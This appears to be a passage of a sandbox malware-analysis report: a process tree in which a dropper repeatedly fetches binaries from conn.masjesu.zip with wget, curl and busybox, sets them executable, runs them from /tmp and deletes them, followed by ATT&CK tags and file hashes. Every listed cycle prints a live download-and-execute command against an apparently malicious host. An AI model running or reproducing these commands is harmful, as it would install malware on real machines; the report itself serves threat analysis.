- PID:961 (depth 2) /bin/chmod: chmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z [File and Directory Permissions Modification]
- PID:962 (depth 2) /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z: ./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z [Executes dropped EXE]
- PID:963 (depth 2) /bin/rm: rm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z
- PID:964 (depth 2) /usr/bin/wget: wget http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI [System Network Configuration Discovery]
- PID:965 (depth 2) /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
- PID:967 (depth 2) /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI [System Network Configuration Discovery]
- PID:968 (depth 2) /bin/chmod: chmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI [File and Directory Permissions Modification]
- PID:969 (depth 2) /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI: ./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI [Executes dropped EXE]
- PID:970 (depth 2) /bin/rm: rm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI
- PID:971 (depth 2) /usr/bin/wget: wget http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0
- PID:972 (depth 2) /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 [Reads runtime system information; Writes file to tmp directory]
- PID:974 (depth 2) /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0
- PID:975 (depth 2) /bin/chmod: chmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 [File and Directory Permissions Modification]
- PID:976 (depth 2) /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0: ./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 [Executes dropped EXE]
- PID:977 (depth 2) /bin/rm: rm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0
- PID:978 (depth 2) /usr/bin/wget: wget http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf [System Network Configuration Discovery]
- PID:979 (depth 2) /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
- PID:981 (depth 2) /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf [System Network Configuration Discovery]
- PID:982 (depth 2) /bin/chmod: chmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf [File and Directory Permissions Modification]
- PID:983 (depth 2) /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf: ./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf [Executes dropped EXE]
- PID:984 (depth 2) /bin/rm: rm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf
- PID:985 (depth 2) /usr/bin/wget: wget http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk [System Network Configuration Discovery]
- PID:986 (depth 2) /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
- PID:988 (depth 2) /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk [System Network Configuration Discovery]
- PID:989 (depth 2) /bin/chmod: chmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk [File and Directory Permissions Modification]
- PID:990 (depth 2) /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk: ./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk [Executes dropped EXE]
- PID:991 (depth 2) /bin/rm: rm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk
- PID:992 (depth 2) /usr/bin/wget: wget http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh [System Network Configuration Discovery]
- PID:993 (depth 2) /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
- PID:995 (depth 2) /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh [System Network Configuration Discovery]
- PID:996 (depth 2) /bin/chmod: chmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh [File and Directory Permissions Modification]
- PID:997 (depth 2) /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh: ./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh [Executes dropped EXE]
- PID:998 (depth 2) /bin/rm: rm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh
- PID:999 (depth 2) /usr/bin/wget: wget http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC [System Network Configuration Discovery]
- PID:1000 (depth 2) /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC [Reads runtime system information; Writes file to tmp directory]
- PID:1002 (depth 2) /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC [System Network Configuration Discovery]
- PID:1003 (depth 2) /bin/chmod: chmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC [File and Directory Permissions Modification]
- PID:1004 (depth 2) /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC: ./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC [Executes dropped EXE]
- PID:1005 (depth 2) /bin/rm: rm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC
- PID:1006 (depth 2) /usr/bin/wget: wget http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR
- PID:1007 (depth 2) /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
- PID:1009 (depth 2) /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR [System Network Configuration Discovery]
- PID:1010 (depth 2) /bin/chmod: chmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR [File and Directory Permissions Modification]
- PID:1011 (depth 2) /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR: ./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR [Executes dropped EXE]
- PID:1012 (depth 2) /bin/rm: rm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR
- PID:1013 (depth 2) /usr/bin/wget: wget http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx [System Network Configuration Discovery]
- PID:1014 (depth 2) /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
- PID:1016 (depth 2) /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx [System Network Configuration Discovery]
- PID:1017 (depth 2) /bin/chmod: chmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx [File and Directory Permissions Modification]
- PID:1018 (depth 2) /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx: ./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx [Executes dropped EXE]
- PID:1019 (depth 2) /bin/rm: rm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx
Network
MITRE ATT&CK Enterprise v15
Downloads
-
- Filesize: 153B
- MD5: 998368d7c95ea4293237f2320546e440
- SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
- SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
- SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97